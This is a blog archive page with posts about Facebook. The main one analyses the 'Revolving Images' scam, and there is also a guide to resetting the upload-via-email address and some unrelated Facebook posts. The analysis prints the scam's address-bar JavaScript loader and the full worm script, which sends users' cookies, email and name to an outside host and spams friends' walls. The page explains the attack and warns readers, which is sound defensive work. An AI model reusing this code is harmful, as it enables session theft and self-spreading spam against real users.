SmexyyWeby

Scripting for Fun and Passion

Tag Archives: Facebook

How to safeguard against the Facebook Revolving Images Scam


I assume those who are reading this are already aware of the newest Facebook Revolving Images Scam which is spreading like wildfire.  In the last Article that I wrote about the Scam I discussed what was working in the background of this whole Revolving Images thing. I mentioned about the JavaScript behind it as well.

If you would like to know more in detail about the Scam please read my last post: Facebook Revolving Images Scam

Now in this post I will try to walk you through a solution which I found online to safeguard yourself from this scam and not to become a victim of it again.

The spam is making wall posts and is updating users’ status’. To do this, it is using the a not so newly launched Facebook feature called “Upload Via E-mail”. It is a unique personal Email address given to every user which allows one to post status updates or send photos and videos straight to one’s profile. The spam has recorded this Email address of yours and is using it to update your status. Thankfully, Facebook lets you change this E-mail ID. This is how you can do it.

Step 1: Go over to http://www.facebook.com/mobile/

Find “More Facebook Mobile Products” written somwhere down. Find “Upload Via Email“. Click “Find out more“.

Facebook Mobile Page

Facebook Mobile Page

Step 2: Now look at the image below and click exactly where it says “..refresh your upload email.” or exactly where you see the cursor in the image.

Reset Mobile Upload Email

Reset Mobile Upload Email

Step 3: Now press reset. Don’t worry, your computer will not crumble to pieces. At least, not yet.

Confirm Email Resetting

Confirm Email Resetting

Step 4: If you see an image something like this (below) then you are done for the day. The spam won’t work anymore.

Get New Upload Email

Get New Upload Email

Once done you are safe from the scam. But remember:

DO NOT EVER PASTE ANY UNKNOW JAVASCRIPT CODE INTO YOUR ADDRESSBAR ESPECIALLY WHILE BEING LOGGED INTO ANY IMPORTANT SERVICE LIKE BANKING, SOCIAL MEDIA, EMAIL, ETC.

Read more about the Revolving Images Scam here at: Facebook Revolving Images Scam

Original Article taken from: here thanks to Mr. Pulkit Kaushik and his Reader Zahid for sharing this valuable piece of information with us.

Advertisements

Javascript of Revolving Images Spam on Facebook


NOTE: All links written in this post are for informational purpose only. I will not be responsible for anything which happens to your Facebook account if you choose to click on any of the links. I would not suggest you to click on them at all unless and until you have completely safeguarded yourself. Please click on any of them at your own risk. All other information posted in this blog post is for informational purpose only. I will not be held responsible if anyone decides to use the code provided in the blog post to make any malicious scripts.

UPDATE1: You can report about the Link to facebook submitting the link and other details at http://www.facebook.com/help/contact.php?show_form=report_phishing

UPDATE2: Check out how to Remove the Scam from your affected profile and how to safeguard yourself  at How to safeguard against the Facebook Revolving Images Scam

Recently on Facebook many people have been tricked into unknowingly spamming a link called

http://bit.ly/91wrzd

http://bit.ly/faceb00ked

http://majicalimages.tk/

What this link basically claims to do it to get all the images on your page pop out and revolve. However behind the scenes it is solely intended at making you spam this link further to many more people by posting this message in your Wall:

Really cool Facebook revolving images. MUST SEE http://majicalimages.tk/

please DO NOT CLICK on the above links.

Now when you click on the link you will be taken to a page like this:

image

Now once you are on this page it will ask you to paste the JavaScript in your address bar on a Facebook page. Now as you can see the Javascript is basically:

javascript:(a = (b = document).createElement(“script”)).src = “//graphicgiants.com/majic.js?show”, b.body.appendChild(a); void(0)

Now the script basically attaches the script found at graphicgiants.com/majic.js?show to your current page which eventually makes the browser run that script.

So many people are unknowingly spamming this link to their wall post which in turn is tricking many more people into clicking it.

So I checked it out and what is happening it if you try to open the link graphicgiants.com/majic.js?show in the browser you can never check what JavaScript is running.  However I used the cURL script I wrote earlier in this post to access the link  and I got the whole script which is running in the background. The script is given below(I have indented it properly for clear comprehension):


txt = "Really cool Facebook revolving images. MUST SEE http://niceimages.tk";
txtee = "Really cool Facebook revolving images. MUST SEE http://majicalimages.tk";
alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {
if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";
with(xx = new XMLHttpRequest()) open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"), onreadystatechange = function () {
if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0;
llimit = 20;
t = setInterval(function () {
if (i >= llimit) return;
if (i == 0) {
with(xxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
if (xxx.readyState == 4 && xxx.status == 200) {
with(s = document.createElement("script")) src = "http://graphicgiants.com/mmjaicc.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
document.body.appendChild(s);
}
}, send(null);
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"), setRequestHeader("X-Requested-With", null), setRequestHeader("X-Requested", null), onreadystatechange = function () {
if (xxxx.readyState == 4 && xxxx.status == 200) {
with(s = document.createElement("script")) src = "http://graphicgiants.com/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c=" + document.cookie;
document.body.appendChild(s);
}
}, send(null);
}
if (i % 2 == 0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
} else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
i += 1;
}, 2000);
}
}, send(null);
}
}, send(null);

Now I have  highlighted the mail points in this script. Basically its preparing the two main messages to post in the first two lines. And following that its making a new XHR request (Ajax Request) to the scripts at majic.js and mmajaicc.js and passes your cookie values to it. Since you are on a facebook page so your cookie values related to the facebook.com domain are also passed to the script. Now once it gets the cookie its calling the facebook ajax/updatestatus.php with the details of the text it wants to post in your status.

So this is the way you are getting tricked into spreading this spam. So best way to counter this is NOT TO CLICK on any such links.

Also the script seems to have been made by the owners of this page: http://www.facebook.com/GraphicGiants so please go an Report Abuse this Page to stop this spamming. Please leave any comments if you know any more such links or any solution to this problem. I hope Facebook figures it out soon.

Happy Facebooking. Stay Safe.

UPDATE2: Check out how to Remove the Scam from your affected profile and how to safeguard yourself  at How to safeguard against the Facebook Revolving Images Scam

NOTE: All links written in this post are for informational purpose only. I will not be responsible for anything which happens to your Facebook account if you choose to click on any of the links. I would not suggest you to click on them at all unless and until you have completely safeguarded yourself. Please click on any of them at your own risk. All other information posted in this blog post is for informational purpose only. I will not be held responsible if anyone decides to use the code provided in the blog post to make any malicious scripts.

Read More posts related to Facebook

Facebook revamps Messages: Its all about Conversation Now


Email, something which is so much in use these days that its almost impossible for anyone to live without an email and have a substantial presence in this world. Ever single small thing from registering for the cookie competition to applying for a mega lottery. Sending Job Applications to Registering on a Matrimonial website requires an email address.

Personally for me I have 3 major Email Accounts and I operate all three of them pretty regularly. One good solution I found was of forwarding all my mails to one account and then having the whole conversation there. Top that up with the great threading feature that Gmail has so tracking conversations is easier. But then a few days back I saw this cool app on the Android phone of my friend which organized your SMSs also in threads. This is something anyone is going to love. Having the whole conversation with a person at one place.

And I think Facebook just nailed that. Today Facebook announced its latest Messaging Service on its Official Blog which is going to take Facebook Messages to an all new level. The fact which sets this service apart from anything else is that it allows you to have all your conversations at one single place weather they are via Mail, SMS or by Chat. This is something which any one who loves getting connected with his/her friends through all sorts of communication channels, would love to have. Also the feature that conversation with one person are going to be listed under one thread so its going to be a really pleasant experience for the user of this service as is very beautifully said in the blog post itself

They will have the conversational history with the people in their lives all the way back to the beginning: From “hey nice to meet you” to “do you want to get coffee sometime” to “our kids have soccer practice at 6 pm tonight.” That’s a really cool idea.

Not only this. The message service will only allow your friends to send you messages and everything else will go in an Others folder . Also you can select who you want to receive emails from. Its something I believe very good for personal messaging. I personally would prefer to have a personal space in my mail box where I can only receive emails from my close friends and family members. I believe Facebook is going to give me just that solution.

All your messages together

All your messages together

Full conversation history

Full conversation history

The messages you want

The messages you want

Now top that up with something which any Facebook user would love to have. A @facebook.com Email Id. This is something I personally and very excited about it as being a Facebook use it will be great to show off your facebook.com email id and feel proud about it =).

Over all I am loving the service as is said in its announcement and am very eager to use it at the earliest. If you are also interested you can ask for an Invite at http://www.facebook.com/about/messages/

Lets see what they make out of it. Personally for me it will be a great service because I am usually present on facebook 24*7 and its a second home to me. Just waiting for the release and getting my @facebook.com id.

Also check the screenshots of the new Message Service available on Mashable at http://mashable.com/2010/11/15/facebook-messages-video/#5449Facebook-Messages-Splash-Screen

Say NO to facebook quiz Updates


Say No to all Fbuk Quiz UpdatesHeyy Guys.. Fbuking right .. Well I know we all love fbuk like anything and some of us can’t even live without it. But the thing is that there is something that is irritating us these days like on Fbuk.. and that is those silly quizzes that we get to see. Sometimes these quizzes are soo idiotic that they can find your future by asking you silly question like what is the color of your eyes.. Bullshit.

Not only these quizzes take a lot of your time but sometimes they make you complete idiot… aah …. and for people like me who cant resist to try out new apps …. I think this is a boon as I will be saved of all these crap quiz updates.

The cool thing about this script is that it lets you toggle between the hidden and the shown status of the updates so occasionally you can check which of the quizzes are worth taking.

So I was searching for some means to get rid of this crap and here I came across a cool Greasemonkey script.

In order to run the script all you have to do is to install the Greasemonkey Firefox Addon and then You have to install this script from here.

So all you have to do is to install this script and get rid of all those irritatig quiz updates.

%d bloggers like this: